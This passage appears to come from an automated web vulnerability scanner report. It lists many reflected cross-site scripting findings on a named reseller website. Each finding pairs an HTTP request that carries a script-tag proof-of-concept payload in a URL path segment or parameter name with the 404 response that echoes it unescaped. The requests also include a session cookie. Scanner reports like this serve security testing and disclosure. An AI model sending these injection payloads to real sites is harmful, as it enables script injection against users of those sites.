The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 957fd<script>alert(1)</script>9441761927e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names957fd<script>alert(1)</script>9441761927e/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names957fd<script>alert(1)</script>9441761927e/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5043. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 16eba<script>alert(1)</script>163d6df3bd0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes16eba<script>alert(1)</script>163d6df3bd0/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes16eba<script>alert(1)</script>163d6df3bd0/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5044. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8caf1<script>alert(1)</script>000e8a48fc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos8caf1<script>alert(1)</script>000e8a48fc/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos8caf1<script>alert(1)</script>000e8a48fc/images/review/ was not found on this server.</p>
...[SNIP]...

2.5045. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ab6c4<script>alert(1)</script>4e6e33691dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagesab6c4<script>alert(1)</script>4e6e33691dd/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagesab6c4<script>alert(1)</script>4e6e33691dd/review/ was not found on this server.</p>
...[SNIP]...

2.5046. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3071d<script>alert(1)</script>8cd67161692 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review3071d<script>alert(1)</script>8cd67161692/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review3071d<script>alert(1)</script>8cd67161692/ was not found on this server.</p>
...[SNIP]...

2.5047. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc1d9<script>alert(1)</script>11dc99014af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/?cc1d9<script>alert(1)</script>11dc99014af=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/?cc1d9<script>alert(1)</script>11dc99014af=1 was not found on this server.</p>
...[SNIP]...

2.5048. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6dc96<script>alert(1)</script>bb3ac220d82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service6dc96<script>alert(1)</script>bb3ac220d82/domain-names/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service6dc96<script>alert(1)</script>bb3ac220d82/domain-names/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5049. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29f26<script>alert(1)</script>89089efce28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names29f26<script>alert(1)</script>89089efce28/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names29f26<script>alert(1)</script>89089efce28/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5050. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload be3fc<script>alert(1)</script>5cf47b6e92c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesbe3fc<script>alert(1)</script>5cf47b6e92c/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesbe3fc<script>alert(1)</script>5cf47b6e92c/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5051. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 588c0<script>alert(1)</script>a37559de023 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos588c0<script>alert(1)</script>a37559de023/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos588c0<script>alert(1)</script>a37559de023/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5052. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9b596<script>alert(1)</script>d0695dfda43 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images9b596<script>alert(1)</script>d0695dfda43/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images9b596<script>alert(1)</script>d0695dfda43/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5053. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 54a95<script>alert(1)</script>0b7f692be97 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review54a95<script>alert(1)</script>0b7f692be97/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review54a95<script>alert(1)</script>0b7f692be97/0.gif was not found on this server.</p>
...[SNIP]...

2.5054. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b6b8f<script>alert(1)</script>4e9b6871e96 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/0.gifb6b8f<script>alert(1)</script>4e9b6871e96 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/0.gifb6b8f<script>alert(1)</script>4e9b6871e96 was not found on this server.</p>
...[SNIP]...

2.5055. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 356fe<script>alert(1)</script>57730ced639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/0.gif?356fe<script>alert(1)</script>57730ced639=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/0.gif?356fe<script>alert(1)</script>57730ced639=1 was not found on this server.</p>
...[SNIP]...

2.5056. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 589e2<script>alert(1)</script>64e41384537 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service589e2<script>alert(1)</script>64e41384537/domain-names/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service589e2<script>alert(1)</script>64e41384537/domain-names/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5057. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 12b90<script>alert(1)</script>361e64fc958 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names12b90<script>alert(1)</script>361e64fc958/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names12b90<script>alert(1)</script>361e64fc958/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5058. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a52c<script>alert(1)</script>d23e5c1a1fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes1a52c<script>alert(1)</script>d23e5c1a1fe/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes1a52c<script>alert(1)</script>d23e5c1a1fe/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5059. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7811c<script>alert(1)</script>413b7b7d50f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos7811c<script>alert(1)</script>413b7b7d50f/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos7811c<script>alert(1)</script>413b7b7d50f/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5060. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27db5<script>alert(1)</script>8cc581ae297 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images27db5<script>alert(1)</script>8cc581ae297/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images27db5<script>alert(1)</script>8cc581ae297/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5061. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ba0b9<script>alert(1)</script>8af71bced91 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

